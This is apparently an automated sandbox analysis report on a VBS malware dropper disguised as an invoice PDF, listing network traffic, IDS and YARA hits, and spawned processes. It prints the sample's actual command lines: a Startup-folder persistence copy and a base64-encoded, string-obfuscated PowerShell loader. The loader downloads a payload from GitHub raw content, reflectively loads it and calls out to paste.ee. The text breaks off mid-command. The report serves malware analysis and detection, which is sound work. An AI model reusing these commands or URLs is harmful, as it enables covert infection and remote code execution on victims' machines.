Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49709 -> 188.114.96.3:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: paste.ee
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d/DjfVC/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d/DjfVC/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: paste.ee
Source: powershell.exe, 00000008.00000002.1730333035.000001B9DFE59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.1732092735.000001B9DFFF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C94F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000005.00000002.1609296916.000002641E6CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1609296916.000002641E67B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.1609296916.000002641E699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F8005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/DjfVC/0
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C94EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C8043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C8215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 4832, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4844, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4AB432925_2_00007FFB4AB43292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AB631D28_2_00007FFB4AB631D2
Source: FAKTURA-pdf-466366332.vbsInitial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 4832, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4844, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/7@2/3
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alcz2i0u.sd4.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: FAKTURA-pdf-466366332.vbsVirustotal: Detection: 9%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = 